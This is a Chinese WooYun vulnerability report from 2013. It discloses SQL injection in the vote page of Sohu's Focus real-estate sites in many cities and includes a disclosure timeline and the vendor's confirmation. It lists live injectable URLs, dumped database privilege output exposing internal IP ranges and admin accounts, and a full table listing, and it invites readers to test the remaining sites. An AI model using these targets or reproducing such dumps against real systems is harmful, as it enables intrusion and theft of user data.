当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020720

漏洞标题:搜狐某应用某功能存在SQL注入,通杀全国站点

相关厂商:焦点房产

漏洞作者: se55i0n

提交时间:2013-03-27 10:22

修复时间:2013-05-11 10:22

公开时间:2013-05-11 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-27: 细节已通知厂商并且等待厂商处理中
2013-03-27: 厂商已经确认,细节仅向厂商公开
2013-04-06: 细节向核心白帽子及相关领域专家公开
2013-04-16: 细节向普通白帽子公开
2013-04-26: 细节向实习白帽子公开
2013-05-11: 细节向公众公开

简要描述:

看了道哥的黑板报,我觉得我没接触过安全,因为我没有一个裤子!
搜狐,如果你们觉得漏洞不重要可以继续忽略,哥就把该应用全国的裤子都收了!剑心,你收裤子不?

详细说明:

存在问题的应用为搜狐的焦点房产网,全国所有焦点房产网的vote功能都存在注入!
1)仅仅举一个例子,测试站点:http://ts.focus.cn/vote/developer_intro.php?ID=90

2.png


2)测试下数据库用户什么权限,自己看吧;

[*] 'fdbuser'@'10.10.90.%' [19]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW VIEW
privilege: UPDATE
[*] 'fdbuser'@'10.11.160.%' [19]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW VIEW
privilege: UPDATE
[*] 'fdbuser'@'10.11.24.%' [19]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW VIEW
privilege: UPDATE
[*] 'fdbuser'@'192.168.242.%' [19]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW VIEW
privilege: UPDATE
[*] 'fdbuser'@'localhost' [19]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW VIEW
privilege: UPDATE
[*] 'mysqlmon'@'192.168.242.180' (administrator) [26]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'pingmysql'@'10.10.58.195' [1]:
privilege: USAGE
[*] 'pingmysql'@'10.11.36.20' [1]:
privilege: USAGE
[*] 'pingmysql'@'10.11.36.22' [1]:
privilege: USAGE
[*] 'pingmysql'@'192.168.1.128' [1]:
privilege: USAGE
[*] 'pingmysql'@'192.168.1.139' [1]:
privilege: USAGE
[*] 'pingmysql'@'192.168.1.178' [1]:
privilege: USAGE
[*] 'readonly'@'%' [2]:
privilege: CREATE TEMPORARY TABLES
privilege: SELECT
[*] 'repadm'@'192.168.242.%' [1]:
privilege: REPLICATION SLAVE
[*] 'repadm'@'192.168.242.87' [1]:
privilege: REPLICATION SLAVE
[*] 'repladmin'@'10.10.90.%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'repladmin'@'192.168.242.%' [1]:
privilege: REPLICATION SLAVE
[*] 'root'@'127.0.0.1' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE


3)站点数据库;

1.png


4)随便找个库跑下表;

Database: tshouse
[268 tables]
+-------------------------+
| ad_order |
| ad_page |
| ad_position |
| ad_sort |
| ad_style |
| ad_word |
| add_boss_log |
| admin_fakename |
| against_agent |
| agent |
| album_class |
| album_photo_count |
| art_sh_htopic |
| article_admin |
| article_class |
| article_vote |
| bbs_style |
| bj_mem_group_marks |
| bookmarks_category |
| bz_apply |
| click |
| clock |
| cp_msg |
| day_posts |
| db_query_cache |
| del_index |
| deny_msg |
| deny_photo |
| diary_html_head_config |
| diary_resident_config |
| dmc_account |
| dmc_around |
| dmc_askuser |
| dmc_board_account |
| dmc_board_msg |
| dmc_construct_type_dict |
| dmc_deputy |
| dmc_dict_power |
| dmc_dict_structure |
| dmc_direction_dict |
| dmc_dpxl |
| dmc_facilities |
| dmc_favorite |
| dmc_gov_locate |
| dmc_house |
| dmc_investor |
| dmc_keywords |
| dmc_kfs |
| dmc_link |
| dmc_loopline_dict |
| dmc_message |
| dmc_message_class |
| dmc_movement_info |
| dmc_movement_info_bak |
| dmc_movement_info_page |
| dmc_movement_info_proj |
| dmc_news_keywords |
| dmc_noun |
| dmc_price_incre |
| dmc_proj |
| dmc_proj_correct |
| dmc_proj_del |
| dmc_proj_effectphoto |
| dmc_proj_link |
| dmc_proj_maillist |
| dmc_proj_mobilelist |
| dmc_proj_photo |
| dmc_proj_price_list |
| dmc_proj_sale_list |
| dmc_proj_tag |
| dmc_proj_tuangou |
| dmc_proj_type_dict |
| dmc_register |
| dmc_related_proj |
| dmc_resident_dict |
| dmc_sale_time |
| dmc_search_house |
| dmc_set |
| dmc_showpiece |
| dmc_subject |
| dmc_subject_item |
| dmc_team |
| dmc_team_sub |
| dmc_tongzhi |
| dmc_txt_top |
| dmc_type |
| dmc_type_class |
| dmc_type_comment |
| dmc_user |
| dmc_zhoubian |
| elite_account |
| elite_article |
| elite_class |
| elite_intro |
| elite_pic |
| eml_templet |
| eml_templet_imgmod |
| eml_templet_mod |
| emml_email_template |
| emml_focus_mail |
| emml_list |
| emml_login_session |
| emml_mail_subscribe |
| emml_maillist |
| emml_options |
| emml_sendmail |
| emml_subscriber |
| emml_subscriber_del |
| eye_hot |
| files_category |
| focus_gift |
| focus_msg |
| focustalk_a |
| focustalk_jb |
| focustalk_q |
| focustalk_q_a |
| focustalk_suji |
| forum_elite_detail |
| forum_elite_tag |
| forum_favourite |
| forum_focus_detail |
| forum_news_sort |
| gather |
| gather_bak |
| gift_change |
| graph_news |
| graph_news_hot |
| graph_news_hot_seed |
| group_around |
| group_article |
| group_article_del |
| group_focus |
| group_forum_tongji |
| group_help_phone |
| group_info |
| group_member |
| group_member_sort |
| group_member_week_sort |
| groupweeksort |
| groupweeksort_temp |
| hide_msg |
| hot_news_ad |
| house_album_focus |
| house_album_info |
| house_bookmarks |
| house_click |
| house_click_7 |
| house_count |
| house_day_update |
| house_files |
| house_forum |
| house_forum_admin |
| house_forum_del |
| house_forum_delbak |
| house_forum_edit |
| house_forum_elite |
| house_forum_newmsg |
| house_forum_tags |
| house_forum_top |
| house_forum_warn |
| house_group |
| house_group_detail |
| house_group_pic |
| house_menu |
| house_msg_tags |
| house_photos |
| house_photos_class |
| house_photos_commend |
| house_photos_count |
| house_photos_del |
| house_photos_focus |
| house_photos_nearby |
| house_sub_forum |
| houseztmaker |
| hv_base_new |
| info |
| linkman |
| lock_msg |
| materials |
| materials_brand |
| materials_brand_class |
| materials_click_7 |
| materials_click_log |
| materials_commend |
| materials_owner |
| materials_photo |
| mem_half_marks |
| memberweeksort |
| memberweeksort_temp |
| modmsg |
| modmsg_time |
| msg_click_temp |
| msg_count |
| msg_count_del |
| msg_count_sort |
| msg_count_temp |
| msg_stat |
| msg_stat_week |
| msg_view_log |
| note |
| note_content |
| note_del |
| note_info |
| note_type_relation |
| online_user |
| page |
| permit_member |
| personl_order |
| photo_click_temp |
| photos_album |
| photos_album_del |
| photos_album_extend |
| photos_album_vote |
| photos_class |
| photos_vote |
| photos_vote_count |
| pollresult |
| polls |
| prep_subj |
| prep_subj_cite |
| prep_subj_class |
| prep_subj_item |
| project_users |
| py_zdwc |
| register_20050425 |
| review_renke |
| review_type |
| review_user_sort |
| reviewhouse |
| reviewhouse_assess |
| reviewhouse_grade |
| room_type |
| sales |
| sales_log |
| sales_order |
| sales_proj |
| secret_forum_key |
| secret_forum_key_log |
| seven_group_marks_view |
| sub_group_forum |
| tbl_bbsadmin_apply |
| tbl_news_media |
| tbl_news_sycount |
| tbl_news_syztcount |
| tbl_news_top |
| tbl_recommend_forum |
| tbl_recommend_user |
| tejiafang |
| v2012_hot_posts |
| vote |
| wap_pic_dev |
| wap_picture_class |
| warn_wordsdetail |
| yaohao_data1 |
| yaohao_data2 |
| yaohao_data3 |
| yaohao_data4 |
| yaohao_list |
| yaohao_open1 |
| yaohao_open2 |
| yaohao_open3 |
| yaohao_open4 |
| yaohao_sort1 |
| yaohao_sort2 |
| yaohao_sort3 |
| yaohao_sort4 |
| yaohao_target3 |
| yaohao_target4 |
+-------------------------+


5)哥又检测了一些站点,肯定全国各地的焦点房产网都存在同样的问题;

http://sz.focus.cn/vote/developer_intro.php?ID=236
http://cs.focus.cn/vote/developer_intro.php?ID=746
http://house.focus.cn/vote/developer_intro.php?ID=2093
http://bd.focus.cn/vote/developer_intro.php?ID=59
http://cq.focus.cn/vote/developer_intro.php?ID=1548
http://tj.focus.cn/vote/developer_intro.php?ID=827
http://zz.focus.cn/vote/developer_intro.php?ID=547
http://nc.focus.cn/vote/developer_intro.php?ID=17
http://huizhou.focus.cn/vote/developer_intro.php?ID=1859
http://km.focus.cn/vote/developer_intro.php?ID=768
http://xa.focus.cn/vote/developer_intro.php?ID=1494
http://jn.focus.cn/vote/developer_intro.php?ID=150029
http://hrb.focus.cn/vote/developer_intro.php?ID=55
http://dl.focus.cn/vote/developer_intro.php?ID=797
http://cd.focus.cn/vote/developer_intro.php?ID=111835
http://hz.focus.cn/vote/developer_intro.php?ID=687
http://yc.focus.cn/vote/developer_intro.php?ID=86


PS:剩下的你们自己去测试吧!

漏洞证明:

见详细说明~

修复方案:

版权声明:转载请注明来源 se55i0n@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-27 10:39

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-27 18:25 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    通杀全国站点?这是个亮点楼主是哪个组织的

  2. 2013-04-26 12:10 | 偉哥 ( 实习白帽子 | Rank:67 漏洞数:11 | 哥是没帽子)

    才10?好不给力